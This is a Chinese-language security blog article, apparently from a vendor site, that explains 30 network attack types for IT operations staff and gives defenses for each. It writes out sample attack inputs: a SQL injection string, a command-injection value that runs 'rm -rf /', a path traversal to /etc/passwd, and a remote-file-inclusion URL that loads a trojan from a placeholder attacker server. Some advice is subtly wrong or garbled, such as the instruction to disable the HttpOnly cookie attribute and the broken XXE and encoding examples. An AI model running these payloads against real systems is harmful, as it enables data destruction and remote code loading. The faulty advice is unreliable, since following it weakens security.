從基礎到高階:30 種網路攻擊拆解,IT 運維懂半數就是安全主力

By /
Faronics How to adapt to modern cyber attacks
2023 年某製造業集團遭遇 WannaCry 變種勒索病毒時,IT 運維主管張先生的處置至今仍是行業範例:面對安全團隊卡殼的「SMB 協議漏洞溯源」,他憑藉日常對系統協議的深耕,2 小時內隔離 12 台感染主機,48 小時內通過離線備份恢復核心生產系統 —— 這場危機讓所有人意識到:優秀的運維,本就是企業最隱形的安全高手。
如今網路攻擊已成企業「常態化風險」,而多數安全事件爆發,根源往往是運維環節的認知缺口(如忽視 VLAN 隔離)或操作疏漏(如延遲安裝高危補丁)。本文系統梳理 30 種最常見的網路攻擊類型,從基礎攻擊到高階威脅,每種都附「原理 + 落地防禦方案」。對 IT 運維而言,能吃透其中 15 種並轉化為防禦動作,就足以成為團隊裡的「安全骨幹」。
一、基礎攻擊類型
  1. DDoS 攻擊(分散式拒絕服務攻擊):攻擊者操控「肉雞網路」(多為感染木馬的家用設備、物聯網終端),向目標伺服器發送海量無效請求,耗盡頻寬、CPU 運算資源或 TCP 連接數,導致合法用戶無法訪問。防禦需部署專業清洗設備(如深信服 Anti-DDoS、阿里云高防 IP),搭配彈性頻寬與負載均衡(如 Nginx、F5)。
  1. 暴力破解(Brute Force Attack):透過 Hydra、Burp Suite 等工具,自動化嘗試使用者名 + 密碼組合(常搭配字典檔)。防禦需強制「密碼長度≥12 位 + 字母數字特殊符號混合」,實施 MFA(如企業微信驗證、硬體令牌),並設定「5 次失敗鎖定 30 分鐘」的規則。
  1. 密碼噴射(Password Spraying):針對數百個企業帳戶,僅嘗試「Season@2024」「Company123」等 5-10 個常用密碼,規避單帳戶鎖定策略。防禦需透過 SIEM 系統(如 Splunk、奇安信天擎)監控「同一 IP 短時間登錄多帳戶」行為,禁用所有預設帳號(如 admin、guest)。
  1. 憑證填充(Credential Stuffing):利用暗網洩露的「帳密組合」(如某外網論壇洩露的用戶數據),批量嘗試登錄企業 OA、郵件系統(多因員工跨平台復用密碼)。防禦需部署憑證洩露檢查工具(如微步在線「憑證核查」),強制員工每 90 天更換密碼且不與過去 3 次重複,並全量開啟 MFA。
  1. 網路釣魚(Phishing):偽造 IT 部門「密碼即將過期」郵件、財務「付款確認通知」,誘導點擊惡意連結(多指向仿冒登錄頁)或下載巨集病毒附件。防禦需每月開展釣魚模擬測試(如使用 Gophish 工具),部署郵件過濾閘道(如梭子魚、麥肯錫),並配置 SPF/DKIM/DMARC 三項協議。
  1. 魚叉式釣魚(Spear Phishing):針對財務主管偽造「總經理簽字的付款申請」,或針對技術主管偽造「廠商技術支援文件」,資訊精準度極高。防禦需規定「敏感操作必須線下二次確認」(如付款前電話核實),對外部郵件統一標註「【外部來件】」。
  1. 水坑攻擊(Watering Hole Attack):入侵企業員工常訪問的行業網站(如製造業的「中國工控網」),植入惡意 JavaScript 代碼,感染訪問者終端。防禦需強制瀏覽器開啟「自動更新」,禁用未經審核的外掛,並部署 EDR 工具(如卡巴斯基 EDR、奇安信 EDR)檢測異常代碼執行。
  1. 中間人攻擊(Man-in-the-Middle Attack, MitM):在公共 WiFi(如咖啡廳、機場)中偽造路由,竊聽員工遠端辦公的數據(如未加密的 VPN 連接),甚至竄改傳輸內容。防禦需強制員工使用企業專屬 VPN(如華為 SVN、Cisco AnyConnect),所有網站部署 HTTPS 並開啟 HSTS,警惕「憑證不匹配」彈窗。
  1. 惡意軟體(Malware):包含病毒(需依附檔案執行)、蠕蟲(可自我傳播)、木馬(隱藏後門)等,常透過 U 盤、下載站入侵。防禦需部署終端防毒軟體(如趨勢科技、諾頓),關閉「自動運行 U 盤」功能,並執行「最小安裝原則」(禁止員工安裝非工作軟體)。
  1. 勒索軟體(Ransomware):加密伺服器檔案(常見格式如.docx→.locked、.pdf→.cryp),彈窗索要比特幣贖金(如 LockBit、Conti 家族)。防禦需執行「3-2-1 備份策略」(3 份副本、2 種介質、1 份離線),每月測試恢復有效性,並及時安裝作業系統高危補丁(如 Windows 的 MS17-010)。
二、漏洞利用與欺騙
  1. SQL 注入(SQL Injection):在 Web 表單(如登錄頁、搜索框)輸入「’ OR 1=1–」等惡意代碼,操縱資料庫執行非預期操作(如竊取用戶密碼、刪除數據表)。防禦需使用參數化查詢(如 Java 的 PreparedStatement、Python 的 SQLAlchemy),嚴格驗證輸入格式(如禁止特殊符號),並限制應用程式對資料庫的權限(禁止 DROP、ALTER 指令)。
  1. 跨站指令碼攻擊(Cross-Site Scripting, XSS):在論壇、留言板注入「竊取 Cookie 代碼」,當其他用戶訪問時執行,導致會話劫持。防禦需對使用者輸入進行「輸出編碼」(如將 < 轉為 <),部署內容安全策略(CSP)禁止未授權指令碼加載,並禁用 Cookie 的「HttpOnly」屬性。
  1. 跨站請求偽造(Cross-Site Request Forgery, CSRF):誘騙已登錄 OA 的員工點擊惡意鏈接,自動提交「修改密碼」「申請付款」請求。防禦需在所有表單中加入隨機 CSRF 令牌(如 Spring Security 的 CsrfToken),關鍵操作(如轉帳)需二次輸入密碼或驗證 MFA,避免依賴 Referer 頭(易被偽造)。
  1. 零日攻擊(Zero-Day Attack):利用未公開的軟體漏洞(如 2024 年 Chrome 的 CVE-2024-0517),供應商補丁發布前無官方防禦方案。防禦需部署 IDS/IPS 設備(如華三 SecPath、Palo Alto),開啟應用程式白名單(僅允許授權程式執行),並透過沙箱(如 Cuckoo Sandbox)檢測未知樣本。
  1. 檔案包含漏洞(File Inclusion):利用 PHP 網站的「include ($_GET [‘file’])」代碼,輸入「?file=http:// 攻擊者伺服器 / 木馬.php」,加載遠端惡意檔案(RFI)。防禦需禁止使用者控制檔案路徑,設定白名單(僅允許加載「/include/」目錄下的檔案),並在 php.ini 中禁用「allow_url_include=On」。
  1. 命令注入(Command Injection):在「伺服器 IP 查詢」功能中輸入「8.8.8.8; rm -rf /」,使應用執行刪除系統檔案的惡意命令。防禦需避免直接呼叫 system ()、exec () 等危險函數,改用安全 API(如 Java 的 InetAddress),並嚴格過濾「;、|、&」等特殊符號。
  1. 路徑遍歷(Path Traversal):在「下載檔案」功能中輸入「../../etc/passwd」,繞過目錄限制訪問伺服器敏感檔案。防禦需將使用者輸入的路徑與「基礎目錄」拼接(如限定在「/var/www/download/」下),過濾「../」「..\」等字符,並設定 Web 伺服器權限(如 Nginx 運行用戶無根目錄訪問權)。
  1. 伺服器端請求偽造(Server-Side Request Forgery, SSRF):欺騙企業後端伺服器,向內網 192.168.1.1(路由器管理頁)發起請求,掃描內網設備或攻擊未對外開放的服務。防禦需校驗使用者提供的 URL(禁止訪問內網 IP 段,如 10.0.0.0/8192.168.0.0/16),限制伺服器出站連接(透過防火牆禁止連接非必要端口)。
  1. XML 外部實體注入(XML External Entity Injection, XXE):利用 XML 解析器的「外部實體引用」功能,輸入「]>」,讀取伺服器檔案。防禦需在解析器配置中禁用外部實體(如 Java 的 DocumentBuilderFactory.setFeature (XMLConstants.FEATURE_SECURE_PROCESSING, true)),使用 JSON 替代 XML 傳輸數據。
  1. 社會工程學(Social Engineering):攻擊者偽裝「IT 維修人員」電話聯繫員工,騙取「臨時登錄密碼」;或假冒「財務經理」微信要求「緊急轉賬」。防禦核心是每月開展安全培訓(聚焦「電話詐騙」「即時通訊騙局」場景),制定「敏感資訊核實流程」(如內部電話需回撥企業總機轉接)。
三、高階攻擊與權限濫用
  1. APT 攻擊(高階持續性威脅):多由國家級團隊發起(如 APT29、APT40),針對能源、金融等關鍵行業,通過「釣魚郵件植入木馬→長期潛伏收集數據→加密毀滅證據」的多階段流程發起攻擊。防禦需建立縱深防禦體系(網路層 + 主機層 + 應用層),接入威脅情報平台(如奇安信威胁情报中心、微步在线),並配置 24 小時安全監控團隊(SOC)。
  1. 供應鏈攻擊(Supply Chain Attack):入侵軟體供應商(如 2020 年 SolarWinds 事件),在合法軟體安裝包中植入惡意代碼,當企業下載安裝時感染系統。防禦需驗證軟體數字簽名(如檢查 Windows 的數字證書),對第三方軟體進行「沙箱預測試」,並透過網路分段隔離核心業務系統與外網。
  1. Pass-the-Hash 攻擊:攻擊者通過 Mimikatz 工具竊取 Windows 主機的 NTLM 密碼雜湊值(无需獲取明文密碼),利用該雜湊值登錄同一域內的其他伺服器。防禦需在 Windows 伺服器中啟用 Credential Guard(隔離密碼雜湊存儲),實施「本機管理員帳戶唯一化」(避免所有主機使用相同 admin 密碼),並限制普通用戶的「遠端桌面」權限。
  1. 黃金票據攻擊(Golden Ticket Attack):攻擊者獲取網域控制站的 KRBTGT 帳戶密碼雜湊後,偽造任意用戶的 Kerberos TGT 票證,可長期控制整個網域(即使後續更換其他帳戶密碼)。防禦需每 90 天變更 KRBTGT 帳戶密碼(需更換 2 次以無效化舊票證),透過 SIEM 監控「異常 Kerberos 票證請求」(如非工作時間申請高權限票證)。
  1. Kerberoasting 攻擊:攻擊者透過 GetUserSPNs 工具,請求帶有 SPN(服務主體名稱)的域帳戶(如 SQL Server 服務帳戶)的 ST 票證,離線暴力破解其密碼雜湊。防禦需強制服務帳戶使用「16 位以上複雜密碼」,啟用 Kerberos AES-256 加密,並定期審核 SPN 註冊(刪除無用的 SPN)。
  1. DNS 劫持(DNS Hijacking):攻擊者修改企業路由器的 DNS 設置(如將 8.8.8.8 改為惡意 DNS 伺服器),或入侵 ISP 的 DNS 伺服器,使員工訪問「www.baidu.com」時指向釣魚網站。防禦需在網路設備中配置 DNSSEC(驗證 DNS 解析結果完整性),強制企業內部使用安全 DNS(如阿里 DNS 223.5.5.5、騰訊 DNS 119.29.29.29),並定期檢查路由器 DNS 設置。
  1. 域名仿冒(Typosquatting):註冊與企業域名相似的「錯別字域名」(如企業官網是「abc.com」,仿冒域名是「abс.com」—— 其中「с」是俄語字符),用於搭建釣魚網站。防禦需提前註冊相似域名(如「ab.com」「abc123.com」),在瀏覽器中部署域名防偽插件(如 Chrome 的「DomainGuard」),並對員工開展「域名辨識」培訓。
  1. 雲元數據服務濫用:攻擊者通過雲伺服器(如 AWS EC2、阿里雲 ECS)內部的元數據服務地址(169.254.169.254),獲取臨時訪問憑證,進而控制其他雲資源(如 S3 存儲桶)。防禦需在雲平台中啟用 IMDSv2(AWS)或「元數據服務訪問控制」(阿里雲),限制僅授權角色可訪問元數據服務,並禁止雲伺服器直接訪問元數據地址。
  1. 容器逃逸(Container Escape):攻擊者利用 Docker 核心漏洞(如 CVE-2021-41190)或「特權容器」配置,突破容器隔離環境,獲取宿主機的 root 權限。防禦需及時更新 Docker、Kubernetes 版本(修復已知漏洞),禁止使用「–privileged」特權容器,並遵循容器安全基準(如 Docker CIS 基準、K8s 安全配置指南)。
  1. VLAN 跳躍攻擊(VLAN Hopping):攻擊者通過修改網卡配置,將流量偽裝為「Trunk 鏈路流量」,或濫用交換器的 DTP 協議,繞過 VLAN 隔離訪問核心業務區(如財務 VLAN)。防禦需在交換器上禁用未使用的埠,關閉 DTP 協議(手動配置 Trunk 埠),並在 Trunk 埠上明確設定「允許通過的 VLAN 列表」(禁止不必要的 VLAN 透傳)。
四、運維人員的安全行動指南
對 IT 運維而言,僅僅「知道」攻擊類型遠遠不夠 —— 必須將知識轉化為可落地的防禦動作,以下 10 點是核心落地方向:
  1. 資產管理:建構「看得見」的基礎
建立動態更新的資產清單,涵蓋伺服器、網路設備、雲資源、軟體版本等資訊,可透過 CMDB 系統(如華為 iMaster NCE、開源 CMDBuild)實現自動化管理。重點標註「核心業務資產」(如 ERP 伺服器、支付系統),確保無「未知設備接入網路」。
  1. 漏洞管理:按風險優先修復
每月用 Nessus、Qualys 等工具掃描全域漏洞,按「CVSS 評分」排序(優先修復≥9.0 的高危漏洞,如 Log4j、Heartbleed),建立「發現→評估→修復→驗證」閉環。對無法及時修復的漏洞(如老舊系統不支援補丁),需臨時部署防火牆規則隔離。
  1. 權限管理:執行「最小權限」原則
所有帳戶僅授予「完成工作必需的權限」:普通員工禁止遠端登錄伺服器,應用程式帳戶無資料庫 DROP 權限,網路設備僅允許管理員從特定 IP 登錄。每季度開展權限審計,回收離職員工、過期專案的權限。
  1. 網路分段:限制攻擊橫向移動
按「業務重要性」將網路分為「核心區」(ERP、財務系統)、「辦公區」(員工電腦)、「DMZ 區」(對外 Web 伺服器),用防火牆(如華為 USG、Cisco ASA)設定區間訪問規則(如禁止辦公區直接訪問核心區)。對雲環境,使用 VPC 隔離不同業務模組。
  1. 縱深防禦:多層防線互補
物理層:機房安裝門禁、監控;網路層:部署 IDS/IPS、WAF(如阿里云 WAF、深信服 WAF);主機層:安裝 EDR、禁用不必要服務;應用層:實施 API 介面認證、輸入驗證;數據層:加密敏感數據(如數據庫 TDE 加密、文件 AES 加密)。避免依賴單一防線。
  1. 身份驗證:杜絕「單一密碼」風險
在 OA、CRM、伺服器等所有關鍵系統中強制 MFA,優選「硬體令牌」「生物識別」(如指紋),次選「企業微信 / 釘釘驗證碼」。禁止員工復用密碼,可透過「密碼檢測工具」(如 HaveIBeenPwned)檢查員工密碼是否在暗網洩露。
  1. 備份恢復:確保「能找回」數據
執行「3-2-1 備份策略」:3 份數據副本(原數據 + 2 份備份)、2 種存儲介質(磁碟 + 磁带 / 雲存儲)、1 份離線備份(隔離於網路之外,防勒索軟體加密)。每月開展恢復演練,記錄「恢復時間目標(RTO)」,確保核心數據恢復時間≤4 小時。
  1. 日誌監控:及時發現異常
將伺服器、防火牆、應用系統的日誌集中採集到 SIEM 平台(如 Splunk、IBM QRadar),配置「異常規則告警」:如「單 IP 10 分鐘內 5 次登錄失敗」「伺服器突然開啟 3389 端口」「大量數據向外網傳輸」。確保告警響應時間≤30 分鐘。
  1. 安全培訓:讓員工成為「第一道防線」
每月開展 1 次針對性培訓:新員工需通過「釣魚郵件辨識測試」才能上崗;老員工聚焦「即時通訊詐騙」「U 盤使用安全」等場景。培訓後通過線上測試驗證效果,對未達標員工開展補訓。
  1. 應急回應:減少「事故損失」
制定《網路安全應急預案》,明確「勒索病毒」「數據洩露」「DDoS 攻擊」等場景的處置流程、責任人、溝通渠道。每季度開展 1 次紅藍對抗演練(模擬真實攻擊),優化預案漏洞,確保事故發生時「不慌張、有步驟」。
在網路安全的「攻防對壘」中,攻擊者只需找到 1 個漏洞就能突破防線,而運維必須築牢所有可能的缺口。對 IT 運維而言,這 30 種攻擊類型不是「理論知識」,而是日常工作中需要防範的「具體風險」—— 比如配置防火牆時要想到「VLAN 跳躍」,更新補丁時要記得「零日攻擊」,甚至教員工辨識釣魚郵件時,也要知道「魚叉式釣魚」的特點。
真正的運維大牛,從不是「背得出所有攻擊原理」,而是能把這些知識融入每一次配置、每一次檢查中:補丁更新時優先處理高危漏洞,權限分配時堅持最小原則,備份時確保離線存儲 —— 這些看似瑣碎的操作,恰恰是企業安全最堅實的防線。畢竟,運維的每一個小動作,都在決定企業安全的「底線」。

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top